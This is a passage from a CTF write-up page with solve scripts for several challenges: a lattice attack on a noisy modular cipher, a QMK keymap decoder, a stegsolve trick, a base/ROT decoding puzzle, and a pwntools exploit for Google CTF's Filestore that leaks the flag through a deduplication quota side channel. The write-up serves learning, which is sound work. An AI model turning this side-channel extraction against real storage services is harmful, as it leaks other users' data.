import random

prime =  2141
print len(flag)
flag = map(ord,flag)
flag1 = flag[:21]
flag2 = flag[21:]
row = 64

def add(msg1,msg2):
    return [(x+y)%prime for x,y in zip(msg1,msg2)]

def multi(msg1,msg2):
    out = []
    for l in msg1:
        s = 0
        for x,y in zip(l,msg2):
            s += (x*y)%prime
            s %= prime
        out.append(s)
    return out
def genkey(leng):
    l = [[] for i in range(row)]
    for x in range(row):
        for i in range(leng):
            l[x].append(random.randint(0,511))
    return l

key = genkey(len(flag1))
print key

cipher1 = multi(key,flag1)

print cipher1

cipher2 = multi(key,flag2)

noise = [random.randint(0,6) for i in range(row)]
print add(noise,cipher2)
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">from sage.all import *
from sage.modules.free_module_integer import IntegerLattice
from random import randint
import sys
from itertools import starmap
from operator import mul

with open('out', 'r') as f:
    key = eval(f.readline())
    c1 = eval(f.readline())
    c2 = eval(f.readline())

prime = 2141

K = matrix(Zmod(prime), key[:21])
C1 = vector(Zmod(prime), c1[:21])
m1 = K.inverse() * C1
flag = ''
for i in m1:
    flag += chr(i)
print(flag)


# Babai's Nearest Plane algorithm
def Babai_closest_vector(M, G, target):
    small = target
    for _ in range(5):
        for i in reversed(range(M.nrows())):
            c = ((small * G[i]) / (G[i] * G[i])).round()
            small -= M[i] * c
    return target - small


m = 64
n = 21
q = prime

A_values = key
b_values = c2

A = matrix(ZZ, m + n, m)
for i in range(m):
    A[i, i] = q
for x in range(m):
    for y in range(n):
        A[m + y, x] = A_values[x][y]
lattice = IntegerLattice(A, lll_reduce=True)
# print(&quot;LLL done&quot;)
gram = lattice.reduced_basis.gram_schmidt()[0]
target = vector(ZZ, b_values)
res = Babai_closest_vector(lattice.reduced_basis, gram, target)
# print(&quot;Closest Vector: {}&quot;.format(res))

R = IntegerModRing(q)
M = Matrix(R, A_values)
ingredients = M.solve_right(res)

# print(&quot;Ingredients: {}&quot;.format(ingredients))

for i in ingredients:
    flag += chr(i)
print(flag)
</code></pre>
<pre><code class="language-sh">#get flag
sage exp.py
</code></pre>
<h2 id="babyqmk"><a class="header" href="#babyqmk">babyqmk</a></h2>
<pre><code class="language-python">SEED = 0
KC_A = 4
KC_Z = 29
KC_1 = 30
KC_9 = 38
KC_0 = 39
def rand():
    global SEED
    SEED = 214013 * SEED + 2531011
    return (SEED &gt;&gt; 16) &amp; 0x7fff

keycodeToKey = {0:'KC_NO', 1:'KC_TRANSPARENT', 2:'KC_POST_FAIL', 3:'KC_UNDEFINED',
4:'KC_A', 5:'KC_B', 6:'KC_C', 7:'KC_D', 8:'KC_E', 9:'KC_F', 10:'KC_G', 11:'KC_H',
12:'KC_I', 13:'KC_J', 14:'KC_K', 15:'KC_L', 16:'KC_M', 17:'KC_N', 18:'KC_O', 19:'KC_P',
20:'KC_Q', 21:'KC_R', 22:'KC_S', 23:'KC_T', 24:'KC_U', 25:'KC_V', 26:'KC_W', 27:'KC_X',
28:'KC_Y', 29:'KC_Z', 30:'KC_1', 31:'KC_2', 32:'KC_3', 33:'KC_4', 34:'KC_5', 35:'KC_6',
36:'KC_7', 37:'KC_8', 38:'KC_9', 39:'KC_0', 40:'KC_ENTER', 41:'KC_ESCAPE',
42:'KC_BACKSPACE', 43:'KC_TAB', 44:'KC_SPACE', 45:'KC_MINUS', 46:'KC_EQUAL',
47:'KC_LEFT_BRACKET', 48:'KC_RIGHT_BRACKET', 49:'KC_BACKSLASH', 50:'KC_NONUS_HASH',
51:'KC_SEMICOLON', 52:'KC_QUOTE', 53:'KC_GRAVE', 54:'KC_COMMA', 55:'KC_DOT',
56:'KC_SLASH', 57:'KC_CAPS_LOCK', 58:'KC_F1', 59:'KC_F2', 60:'KC_F3', 61:'KC_F4',
62:'KC_F5', 63:'KC_F6', 64:'KC_F7', 65:'KC_F8', 66:'KC_F9', 67:'KC_F10', 68:'KC_F11',
69:'KC_F12', 70:'KC_PRINT_SCREEN', 71:'KC_SCROLL_LOCK', 72:'KC_PAUSE', 73:'KC_INSERT',
74:'KC_HOME', 75:'KC_PAGE_UP', 76:'KC_DELETE', 77:'KC_END', 78:'KC_PAGE_DOWN',
79:'KC_RIGHT', 80:'KC_LEFT', 81:'KC_DOWN', 82:'KC_UP', 83:'KC_NUM_LOCK',
84:'KC_KP_SLASH', 85:'KC_KP_ASTERISK', 86:'KC_KP_MINUS', 87:'KC_KP_PLUS',
88:'KC_KP_ENTER', 89:'KC_KP_1', 90:'KC_KP_2', 91:'KC_KP_3', 92:'KC_KP_4', 93:'KC_KP_5',
94:'KC_KP_6', 95:'KC_KP_7', 96:'KC_KP_8', 97:'KC_KP_9', 98:'KC_KP_0', 99:'KC_KP_DOT',
100:'KC_NONUS_BACKSLASH', 101:'KC_APPLICATION', 102:'KC_KB_POWER', 103:'KC_KP_EQUAL',
104:'KC_F13', 105:'KC_F14', 106:'KC_F15', 107:'KC_F16', 108:'KC_F17', 109:'KC_F18',
110:'KC_F19', 111:'KC_F20', 112:'KC_F21', 113:'KC_F22', 114:'KC_F23', 115:'KC_F24',
116:'KC_EXECUTE', 117:'KC_HELP', 118:'KC_MENU', 119:'KC_SELECT', 120:'KC_STOP',
121:'KC_AGAIN', 122:'KC_UNDO', 123:'KC_CUT', 124:'KC_COPY', 125:'KC_PASTE',
126:'KC_FIND', 127:'KC_KB_MUTE', 128:'KC_KB_VOLUME_UP', 129:'KC_KB_VOLUME_DOWN',
130:'KC_LOCKING_CAPS_LOCK', 131:'KC_LOCKING_NUM_LOCK', 132:'KC_LOCKING_SCROLL_LOCK',
133:'KC_KP_COMMA', 134:'KC_KP_EQUAL_AS400', 135:'KC_INTERNATIONAL_1',
136:'KC_INTERNATIONAL_2', 137:'KC_INTERNATIONAL_3', 138:'KC_INTERNATIONAL_4',
139:'KC_INTERNATIONAL_5', 140:'KC_INTERNATIONAL_6', 141:'KC_INTERNATIONAL_7',
142:'KC_INTERNATIONAL_8', 143:'KC_INTERNATIONAL_9', 144:'KC_LANGUAGE_1',
145:'KC_LANGUAGE_2', 146:'KC_LANGUAGE_3', 147:'KC_LANGUAGE_4', 148:'KC_LANGUAGE_5',
149:'KC_LANGUAGE_6', 150:'KC_LANGUAGE_7', 151:'KC_LANGUAGE_8', 152:'KC_LANGUAGE_9',
153:'KC_ALTERNATE_ERASE', 154:'KC_SYSTEM_REQUEST', 155:'KC_CANCEL', 156:'KC_CLEAR',
157:'KC_PRIOR', 158:'KC_RETURN', 159:'KC_SEPARATOR', 160:'KC_OUT', 161:'KC_OPER',
162:'KC_CLEAR_AGAIN', 163:'KC_CRSEL', 164:'KC_EXSEL', 224:'KC_LEFT_CTRL',
225:'KC_LEFT_SHIFT', 226:'KC_LEFT_ALT', 227:'KC_LEFT_GUI', 228:'KC_RIGHT_CTRL',
229:'KC_RIGHT_SHIFT', 230:'KC_RIGHT_ALT', 231:'KC_RIGHT_GUI'}

keymaps = [0x0029, 0x0000, 0x003A, 0x003B, 0x003C, 0x003D, 0x0000, 0x003E,
0x003F, 0x0040, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046,
0x0047, 0x0048, 0x0035, 0x001E, 0x001F, 0x0020, 0x0021, 0x0022,
0x0023, 0x0024, 0x0025, 0x0026, 0x0027, 0x002D, 0x002E, 0x002A,
0x0000, 0x0049, 0x004A, 0x004B, 0x002B, 0x0000, 0x0014, 0x001A,
0x0008, 0x0015, 0x0017, 0x001C, 0x0018, 0x000C, 0x0012, 0x0013,
0x002F, 0x0030, 0x0031, 0x004C, 0x004D, 0x004E, 0x0039, 0x0000,
0x0004, 0x0016, 0x0007, 0x0009, 0x000A, 0x000B, 0x000D, 0x000E,
0x000F, 0x0033, 0x0034, 0x0028, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x00E1, 0x001D, 0x001B, 0x0006, 0x0019, 0x0005, 0x0011,
0x0010, 0x0036, 0x0037, 0x0038, 0x0000, 0x00E5, 0x0000, 0x0000,
0x0052, 0x0000, 0x00E0, 0x00E3, 0x0000, 0x00E2, 0x0000, 0x0000,
0x002C, 0x0000, 0x0000, 0x0000, 0x00E6, 0x00E7, 0x0000, 0x0065,
0x00E4, 0x0050, 0x0051, 0x004F, 0x0029, 0x0000, 0x003A, 0x003B,
0x003C, 0x003D, 0x0000, 0x003E, 0x003F, 0x0040, 0x0041, 0x0042,
0x0043, 0x0044, 0x0045, 0x0046, 0x0047, 0x0048, 0x0035, 0x0012,
0x0013, 0x000D, 0x0020, 0x001B, 0x0016, 0x000E, 0x0005, 0x0011,
0x001A, 0x002D, 0x002E, 0x002A, 0x0000, 0x0049, 0x004A, 0x004B,
0x002B, 0x0000, 0x0015, 0x000A, 0x0027, 0x0022, 0x0009, 0x0018,
0x0024, 0x0023, 0x0017, 0x0006, 0x002F, 0x0030, 0x0031, 0x004C,
0x004D, 0x004E, 0x0039, 0x0000, 0x0007, 0x0004, 0x0010, 0x000C,
0x0019, 0x0008, 0x001C, 0x0014, 0x000F, 0x0033, 0x0034, 0x0028,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x00E1, 0x001F, 0x000B,
0x001E, 0x0025, 0x001D, 0x0026, 0x0021, 0x0036, 0x0037, 0x0038,
0x0000, 0x00E5, 0x0000, 0x0000, 0x0052, 0x0000, 0x00E0, 0x00E3,
0x0000, 0x00E2, 0x0000, 0x0000, 0x002C, 0x0000, 0x0000, 0x0000,
0x00E6, 0x00E7, 0x0000, 0x0065, 0x00E4, 0x0050, 0x0051, 0x004F,
0x0029, 0x0000, 0x003A, 0x003B, 0x003C, 0x003D, 0x0000, 0x003E,
0x003F, 0x0040, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046,
0x0047, 0x0048, 0x0035, 0x0001, 0x0001, 0x0001, 0x0001, 0x0001,
0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x002D, 0x002E, 0x002A,
0x0000, 0x0049, 0x004A, 0x004B, 0x002B, 0x0000, 0x0025, 0x0004,
0x0023, 0x0015, 0x0008, 0x001D, 0x0019, 0x001F, 0x0006, 0x0027,
0x002F, 0x0030, 0x0031, 0x004C, 0x004D, 0x004E, 0x0039, 0x0000,
0x0010, 0x0007, 0x000F, 0x0009, 0x0021, 0x0022, 0x001E, 0x0026,
0x000B, 0x0033, 0x0034, 0x0028, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x00E1, 0x0018, 0x001C, 0x0024, 0x0014, 0x0017, 0x000C,
0x000A, 0x0036, 0x0037, 0x0038, 0x0000, 0x00E5, 0x0000, 0x0000,
0x0052, 0x0000, 0x00E0, 0x00E3, 0x0000, 0x00E2, 0x0000, 0x0000,
0x002C, 0x0000, 0x0000, 0x0000, 0x00E6, 0x00E7, 0x0000, 0x0065,
0x00E4, 0x0050, 0x0051, 0x004F]
LayerMap = [dict(), dict(), dict()]

def buildLayerMap(layer):
    for i in range(108):
        curr_keycode = keymaps[layer * 108 + i]
        if curr_keycode == 1: # KC_TRANSPARENT
            curr_keycode = keymaps[(layer - 1) * 108 + i]
        LayerMap[layer][ keycodeToKey[ curr_keycode ] ] = keycodeToKey[ keymaps[i] ]


def formatLayer():
    for layer in range(0, 3):
        for col in range(6):
            for row in range(18):
                print(keycodeToKey[ keymaps[layer * 108 + col * 18 + row]].ljust(15),end=',')
            print()
        print()
formatLayer()
buildLayerMap(1)
buildLayerMap(2)
SEED = rand()

sum = 0
enc = &quot;1CTED8IL-BIMM-SMFP-HOKP-HOIDRZL4W6KR&quot;
Table = &quot;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&quot;
flag=&quot;&quot;
for i in range(36):
    rand()
    Layer_stat = (i // 18) + 1
    if enc[i] in Table:
        if Layer_stat == 1:
            keycode = Table.index(enc[i]) - (rand() % 36)
            if keycode &lt; KC_A:
                keycode += 36
            sum += keycode
        else:
            keycode = Table.index(enc[i]) + (sum % 40)
            if keycode &gt; KC_0:
                keycode -= 36
            sum += keycode
        flag += LayerMap[ Layer_stat ][ keycodeToKey[keycode] ][3:]
    else:
        flag += enc[i]
print(&quot;flag{&quot; + flag + &quot;}&quot;)
</code></pre>
<h2 id="01世界"><a class="header" href="#01世界">01世界</a></h2>
<pre><code class="language-sh">stegsolve 01.png
#click left color map get qrcode
#decode qrcode get flag
</code></pre>
<h2 id="base"><a class="header" href="#base">Base</a></h2>
<pre><code class="language-sh">#give 31332b353d3f3f3f2d2d2d2d7a6d6a74706d3838757366677a6d797474736467746d65697a6c6c74787a6d657a61646a766d6f66757365677262776b7a77666a7a61796f7a646d75373d3d3d
ctf-party 31332b353d3f3f3f2d2d2d2d7a6d6a74706d3838757366677a6d797474736467746d65697a6c6c74787a6d657a61646a766d6f66757365677262776b7a77666a7a61796f7a646d75373d3d3d from_hex
#get
13+5=???----zmjtpm88usfgzmyttsdgtmeizlltxzmezadjvmofusegrbwkzwfjzayozdmu7===
#后面部分很像base64，13+5联想到ROT13+ROT5，解密得到
mzwgcz33hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh2===

根据题目Base32解密为flag{9e6ef1a3f5f0e31cadd29c297bef5ad2}
</code></pre>
<p>exp.rb</p>
<pre><code class="language-ruby">require 'ctf_party'

#后面部分很像base64，13+5联想到ROT13+ROT5
s = &quot;zmjtpm88usfgzmyttsdgtmeizlltxzmezadjvmofusegrbwkzwfjzayozdmu7===&quot;
r13 = s.rot(shift: 13)
r5 = s.rot(shift: 5)
p r13  # mzwgcz88hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh7===
</code></pre>
<h2 id="filestoregoogle_ctf"><a class="header" href="#filestoregoogle_ctf">Filestore(Google_CTF)</a></h2>
<p>task.py</p>
<pre><code class="language-python">import os, secrets, string, time

# from flag import flag

# my flag
flag = &quot;flag{1ww717-nxnxksn-xsnjxsnxjs}&quot; 

def main():
    # It's a tiny server...
    blob = bytearray(2**16)
    files = {}
    used = 0

    # Use deduplication to save space.
    def store(data):
        nonlocal used
        MINIMUM_BLOCK = 16
        MAXIMUM_BLOCK = 1024
        part_list = []
        while data:
            prefix = data[:MINIMUM_BLOCK]
            ind = -1
            bestlen, bestind = 0, -1
            while True:
                ind = blob.find(prefix, ind+1)
                if ind == -1: break
                length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))
                if length &gt; bestlen:
                    bestlen, bestind = length, ind

            if bestind != -1:
                part, data = data[:bestlen], data[bestlen:]
                part_list.append((bestind, bestlen))
            else:
                part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]
                blob[used:used+len(part)] = part
                part_list.append((used, len(part)))
                used += len(part)
                assert used &lt;= len(blob)

        fid = &quot;&quot;.join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))
        files[fid] = part_list
        return fid

    def load(fid):
        data = []
        for ind, length in files[fid]:
            data.append(blob[ind:ind+length])
        return b&quot;&quot;.join(data)

    print(&quot;Welcome to our file storage solution.&quot;)

    # Store the flag as one of the files.
    store(bytes(flag, &quot;utf-8&quot;))

    while True:
        print()
        print(&quot;Menu:&quot;)
        print(&quot;- load&quot;)
        print(&quot;- store&quot;)
        print(&quot;- status&quot;)
        print(&quot;- exit&quot;)
        choice = input().strip().lower()
        if choice == &quot;load&quot;:
            print(&quot;Send me the file id...&quot;)
            fid = input().strip()
            data = load(fid)
            print(data.decode())
        elif choice == &quot;store&quot;:
            print(&quot;Send me a line of data...&quot;)
            data = input().strip()
            fid = store(bytes(data, &quot;utf-8&quot;))
            print(&quot;Stored! Here's your file id:&quot;)
            print(fid)
        elif choice == &quot;status&quot;:
            print(&quot;User: ctfplayer&quot;)
            print(&quot;Time: %s&quot; % time.asctime())
            kb = used / 1024.0
            kb_all = len(blob) / 1024.0
            print(&quot;Quota: %0.3fkB/%0.3fkB&quot; % (kb, kb_all))
            print(&quot;Files: %d&quot; % len(files))
        elif choice == &quot;exit&quot;:
            break
        else:
            print(&quot;Nope.&quot;)
            break

try:
    main()
except Exception:
    print(&quot;Nope.&quot;)
time.sleep(1)
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">from pwn import *

local = True
debug = False

if local:
    r = process([&quot;python3&quot;, &quot;task.py&quot;], level='debug') if debug else process([&quot;python3&quot;, &quot;task.py&quot;])
else:
    r = remote(&quot;filestore.2021.ctfcompetition.com&quot;, 1337, level = 'debug') if debug else remote(&quot;filestore.2021.ctfcompetition.com&quot;, 1337)


possible_chars = [chr(i) for i in range(33, 127)]

FLAG = &quot;flag{&quot;
r.recvuntil(b&quot;- exit\n&quot;)

for _ in range(30):
    try:
        for char in possible_chars:
            r.sendline(b&quot;status&quot;)
            r.recvuntil(b&quot;Quota: &quot;)
            current_quota = r.recvline(keepends=False)
            r.sendline(b&quot;store&quot;)
            r.sendline(FLAG[-15:] + char)
            r.sendline(b&quot;status&quot;)
            r.recvuntil(b&quot;Quota: &quot;)
            new_quota = r.recvline(keepends=False)
            if new_quota == current_quota:
                FLAG += char
                print(FLAG)
                break
    except EOFError:
        if local:
            r = process([&quot;python3&quot;, &quot;task.py&quot;], level='debug') if debug else process([&quot;python3&quot;, &quot;task.py&quot;])
        else:
            r = remote(&quot;filestore.2021.ctfcompetition.com&quot;, 1337, level = 'debug') if debug else remote(&quot;filestore.2021.ctfcompetition.com&quot;, 1337)
</code></pre>

                    </main>

                    <nav class="nav-wrapper" aria-label="Page navigation">
                        <!-- Mobile navigation buttons -->
                            <a rel="prev" href="../../posts/ctf/CTF.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                                <i class="fa fa-angle-left"></i>
                            </a>

                            <a rel="next" href="../../posts/ctf/0.1_Web.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                                <i class="fa fa-angle-right"></i>
                            </a>

                        <div style="clear: both"></div>
                    </nav>
                </div>
            </div>

            <nav class="nav-wide-wrapper" aria-label="Page navigation">
                    <a rel="prev" href="../../posts/ctf/CTF.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                        <i class="fa fa-angle-left"></i>
                    </a>

                    <a rel="next" href="../../posts/ctf/0.1_Web.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                        <i class="fa fa-angle-right"></i>
                    </a>
            </nav>

        </div>



        <script>
            window.playground_line_numbers = true;
        </script>

        <script>
            window.playground_copyable = true;
        </script>

        <script src="../../ace.js"></script>
        <script src="../../editor.js"></script>
        <script src="../../mode-rust.js"></script>
        <script src="../../theme-dawn.js"></script>
        <script src="../../theme-tomorrow_night.js"></script>

        <script src="../../elasticlunr.min.js"></script>
        <script src="../../mark.min.js"></script>
        <script src="../../searcher.js"></script>

        <script src="../../clipboard.min.js"></script>
        <script src="../../highlight.js"></script>
        <script src="../../book.js"></script>

        <!-- Custom JS scripts -->
        <script src="../../src/js/custom.js"></script>


    </div>
    </body>
</html>
